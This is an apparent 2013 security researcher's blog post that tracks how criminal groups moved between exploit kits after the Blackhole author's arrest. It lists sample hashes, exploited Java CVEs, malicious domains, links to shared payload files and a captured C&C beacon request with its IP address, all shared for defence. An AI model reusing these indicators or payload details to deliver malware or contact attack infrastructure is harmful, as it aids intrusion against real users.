2013-10-11 - Landscape
Paunch's arrest...The end of an Era !
snipshot of : Spin up of a Supermassive Black Hole Illustration Credit: Robert Hurt, NASA/JPL-Caltech |
Note: This post is a work in progress. Not all group have transitioned. So I will update (if I am able to spot them again) and add some links to significant external posts.
Disclaimer: I do not have the telemetry Antivirus or IDS Vendor can have...sure we could have a better picture than that.
If you are reading this you already know that Paunch, the coder behind Blackhole, has been arrested.
What i will try to cover here is the transition/impact of this on the groups using the Blackhole/Cool EK weapon.
The evolution of what i can see from the "driveby battlefield".
The Actors :
Here are the main groups I am aware of who were using the Blackhole or the Cool EK at the time of arrest. I will describe the distribution, the threats but won't talk (maybe only for now) about the way they handle the "poke a mole" with the Defense (Domains, IPs).
- "Reveton Team" or "Mr.J/MonsterAV" : Cool EK lately on tcp 1024
Cool EK "Reveton" - 2013-10-07 01:37 |
Threat : Mainly Reveton (some Live Security Professional?) . Hundreds of Samples a day. Around 30 threads.
- One Urausy affiliate member (or BestAV itself??) : Cool EK /index.php?p=
Cool EK "Urausy/FakeAV" & Urausy Calling Home 2013-10-04 07:00 |
Threat : Urausy / Fake AV. See: The missing link - Some lights on "Urausy" affiliate 2013-05-29
- Home Gang (or q.php or Darkleech fuelled) :
/Home/ Blackhole - 2013-09-30 |
Filtering IE only both on the Darkleech Side and on the Blackhole itself.
Threat : They were pushing Pony which was then (depending of your country) pushing Urausy or Nymaim.b (which itself was loading Zaccess or Nymaim.a Ransomware). 1 thread, around 30 rotation a day.
See : Late Disclosure - Darkleech Actors /Home/ - some numbers 2013-10-10 (more reading there)
- Ex-Tkr /i/last blackhole (or CDorked.A Fuelled) :
Ex-Tkr Blackhole Pushing Carberp.J (MS) aka Glupteba.G (Eset) 2013-09-16 |
Threats : 3 threads, 2 payloads familly : Carberp.J (200ko) and Leechole (50ko)
More than 240 samples a day (15-20 for Carberp - and around 110 for each Leechole).
See: Linux/Cdorked.A malware: Lighttpd and nginx web servers also affected 2013-05-07 Marc-Etienne M. Léveillé 2013-07-05
- /closest/ Blackhole :
BH EK Closest pushing the STI (pay per install clickfraud) Payload 2013-09-26 |
Distribution : Lately, mainly LinkedIn spam redirecting to some compromised wordpress.
Threats : Zaccess, Cutwail, STI (Pay Per install clickfraud affiliate tied to Zaccess). They pushed some Cridex in the past too.
- /topic/ - Zeus Game Over gang :
This is the blackhole with the highest number of threads. Not sure it can be operated by only one guy. Or he must be really well organised !
/topic/ BH EK pushing 2 payloads (ZGO & Dipverdle (a loader) ) 2013-09-30 |
Distribution : Many compromised website (OT: they are also working a lot by mail attachments)
Threats : More than 60 threads. More than 2000 rotating samples a day.
The main activity is pushing Pony (different for many threads) as a loader for ZeusGameOver.
But we could see also : Medfos, MagicTraffic (PPI ClickFraud tied to Zaccess), some fakeav, even Kovter Ransomware.
- /ngen/ Blackhole
/Ngen/ Blackhole pushing Citadel (you can see the call home : /ckt/ ) and Zaccess 2013-09-11 |
Distribution : A lot of compromised website with a TDS sharing (hosted with?) the infrastructure of the Blackhole. (/sword/in.cgi may remind you things)
Threats : Shylock, Zaccess, those day (but some Sinowal, Ursnif, Zbot, Citadel in the past too)
- /xlawr/ Blackhole
/xlawr/ Blackhole pushing FakeRean 2013-09-27 |
Distribution : mainly compromised websites.
Threats : 2 threads around 50 samples a day: Zaccess and FakeRean 855ko- Customer "hosted 1" in Rented mode (will cover the main based on traffic amount and longevity).
Distribution : Compromised website, 2 step (with a js on another compromised site as TDS)
Threat : 1 thread, 3 payloads. For instance :
525226d13a45ade20dafbe9f9c9a2a23 (Pony)
2964a7f348b0bb9cf1c0228faf4b59b5 (Zaccess)
871943c23662e6da246aa34534ba47aa (zbot)
- /news/ Blackhole
/news/ BH EK pushing Zeus Game Over |
Distribution : mainly via spam (lately related to Pinterest)
Threats : fast rotating thread...hard to follow. Lately pushing ZeusGameOverBut in the past they were pushing Cridex/Bugat, or Inlev.B gathering Tesch.A (Zaccess?), or Ursniff
Some of their domains : bbb-complaints.org, pinformer.net, cool-mail.net
They are not new in the business : http://blog.dynamoo.com/2012/06/wire-transfer-hp-spam-and.html
Some Urlquery traces
- /vague/ Blackhole
This blackhole was hard to find. It was the infector for the Citadel /ppp/ that made some noise for being Japan and Germany focused.
Live Infection vector for the Citadel targeting japan illustrated cc @Xylit0l @unixfreaxjp https://t.co/zkDLHV0EDY pic.twitter.com/ahtg3jJQ5l
— kafeine (@kafeine) September 3, 2013
I won't talk about /adfasdfksjdfn/ Sinowal BH EK (while still reachable it's not in use anymore) neither the white/purple Cool EK which is blinking (and quite surely built on a leak of Cool EK Code) neither the /reveals/ or /news/ blackhole (except if i spot the groups after transition).
That day: 2013-10-07
BREAKING: Blackhole exploit kit author "Paunch" and his partners arrested in Russia #Blackhole #Paunch #ExploitKit #Malware
— Maarten Boone RCX (@staatsgeheim) October 7, 2013
This was ground breaking for me...Seeing the source that could only be true.
That really sounds like....malware now need coffee ...or anxiolytic.
I tried to find some kind of evidences.
Crypt.am down. #Paunch pic.twitter.com/HZKkJ5Nb6SI knew it was up few days earlier cause I gave it a visit again after the "Expanding Business: JavaScript Cryptor Offered by Author of Blackhole Exploit Kit" post from Fortinet. (2013-10-01)
— kafeine (@kafeine) October 7, 2013
Two hours after the tweet, Underground started to react.
Verified :
Verified - Cleaning Mode 2013-10-07 Few hours after the tweet goes viral. |
Exploit .in :
Paunch Blackhole forum thread :Removed.
Nuclear Pack was not anymore on both of these forum but still on darkode.
Neutrino Author's reaction :
Price increase for non Russian customers to 10k/month
<edit:2013-10-11>Now 1 000 000$ per month - See advert here : http://pastebin.com/raw.php?i=6xZDGadQ </edit>
Since then we can see some actors trying to reach Paunch associates in Cool EK or find new solution
"желаю Панчу мужества и побыстрее решить проблемы, но несмотря ни на что работать то нужно"
that mean something like :
"I wish Paunch courage and quickly solve the problem, but no matter what we need to work"
or
"Ребят, если кто работал с панчем по приватному проекту связки - дайте знать. Я - один из клиентов. "
that can be translated as :
"Guys, if anyone has worked with Paunch for a private Exploit Kit project - let me know. I am one of the clients."
That same day i tried to make a "photo" of the battlefield state (going on each of the exploit kit illustrated here)
2013-10-07 - between 2 and 3 hours after the news goes viral |
The Darkleech/Home one is also 502ing.
(I was wondering if the operators are not part of the "partners" mentionned in the tweet).
ALL exploit kit are using an almost 4 days old Jar.
In fact it's a simplification cause there are 3 jars (depending of your config) which are :
3bebb777a0b3e7d416a6327a4777b630 - CVE-2013-2465
c61923eb060b42b6d27373b2d44e7839 - CVE-2013-2460
3478966161745cf3401b2a534523a4bc - CVE-2013-0422
Just now :
Sploit folder state in one of those blackhole. 2013-10-11 |
The Transition :
- "Reveton Team" or "Mr.J/MonsterAV" :
The redirector linked to the "Tale of the North" iframer restarted the redirect only 5 hours after the tweet traffing to Whitehole.
2013-10-07 5 hours after the tweet Reveton team has already switched to WhiteHole |
That was a weird move knowing the conversion rate of this Exploit Kit.
And it did not take long.
The day after the group was moving again. And what i thought was a Whitehole mutation, was more an intermediate state (to avoid loosing traffic?) :
Reveton team transitionning from WhiteHole (tcp 2780) to .... Something New on tcp80 - 2013-10-08 ProTransition ! No interruption. |
And here is the Reveton Group in it's state today :
Angler EK pushing Reveton 2013-10-08 |
I won't make a full post about what we will call Angler EK. One Jar Exploit kit for now.
Xoring payload with key easily found on the landing. No Jsdetect. For sure it's an emergency solution.
Why Angler EK ? cause we can't name this a Monster EK.
Advert for Reveton/Live Security Pro Distribution (nice Angler Fish ! ) |
Files: Angler EK Fiddler (owncloud via goo.gl)
- Ex-Tkr /i/last blackhole (or CDorked.A Fuelled) :
Reading this : Close encounter with Linux/Cdorked.A - Kimberly 2013-10-13 - Stopmalvertising
It seems this group has moved to Neutrino (>> Seems like those guy talk Russian :) ). Same infection source (compromised website with CDorked.A, same TDS and Domain Pattern).
Thanks Kimberly for the solid Referer
Thanks Kimberly for the solid Referer
Ex-TKR Neutrino Thread 2013-10-14 Pushing quite surely Carberp.J/Glupteba.G |
One more : 0622efb24e8436d50d14f387fdb31fac
And one more pass (from FR to get the Leechole)
Ex-TKR Neutrino Thread 2013-10-14 Pushing maybe Leechole |
But calls are sligthly different (an upgrade ? something else? ):
-----C&C-----
144.76.84.132 tcp 8000
GET /stat?uptime=100&downlink=1111&uplink=1111&id=0002D9BC&statpass=bpass&version=20131011&features=30&guid=4c59a191-ced9-40d6-887f-1c2d0668a4a6&comment=20131011&p=0&s= HTTP/1.0
(via Joe Sandbox Cloud )
-----------------------
Files: 3 payloads (Owncloud via goo.gl) Would love any feedback on those samples.
- /news/ Blackhole
They are back on Magnitude. By mail again (pinterest stuff).
/news/ Blackhole operators are now on Magnitude 2013-10-16 |
Here :
ebfe57976c5840a578dd60f9974186
c4d71b94cfe3adbba8f43d927a0d8a
35a613825af980eb1010e8462d5acc
From US same pass dropped me a 4th Payload which was : aa0f08a3fab179a071b1576fd3755a8e (Tesch.B)
Files: 3 payloads (Owncloud via goo.gl) Would love any feedback on the first two samples.
See also : Cutwail Spam Swapping Blackhole for Magnitude Exploit Kit 2013-10-18 - Dell Secureworks CTU
- /vague/ Blackhole :
They move to Nuclear Pack. Here in action :
Nuclear Pack (rejecting non JP traffic) pushing Citadel 2013-10-27 |
Payload : d6ed9120d489227c7195cb792581f068
- Home Gang (or q.php or Darkleech fuelled) :
No Exploit Kit spotted for NowNymaim: Browsing for trouble - 2013-10-23 - Jean-Iain Boutin - Eset
- /topic/ - Zeus Game Over gang :
No Exploit Kit spotted for Now
Zgo keep spreading via mail attachment (source : Dell SecureWorks), now using Upatre.
Read: Upatre: Another Day Another Downloader Brett Stone-Gross and Russell Dickerson - 2013-10-04
Zgo keep spreading via mail attachment (source : Dell SecureWorks), now using Upatre.
Read: Upatre: Another Day Another Downloader Brett Stone-Gross and Russell Dickerson - 2013-10-04
- /ngen/ Blackhole :
"Ngen" Sutra traffing to Nuclear Pack. Threats : Zaccess (SmartPrivate) & Shylock 2013-11-26 |
6123a7fde34de0237c644e5e1381af50 Zaccess
5c446faa9ebebfc9de85dc84c7559d07 Shylock
/closest/
----
--- That's all folks. For now ---
If you have any intel, information, question about this, I'd love to hear about it. [email protected]
---------------------------------
Clarification: I did not contact Media as it is written here or there. I only replied to questions I received in my mailbox following some tweets (please consider it before thinking : "Media Whore").PS : Sharing is part of our defenses. Crediting is part of the trust/sharing process. You can freely use data from here but please, don't be a douchebag, credit your source. Each time I see/read/hear someone bragging with data he easily gathered here (without crediting)... the idea "stop the share" "pop" in my mind.
Reading :
2013-12-06 - Google Translate of the Official Announcement - Russian Ministry of Internal Affairs
2013-12-06 - Group-IB assists to suppress activities of the “Blackhole” exploit-kit author, said “Paunch” is arrested - Group IB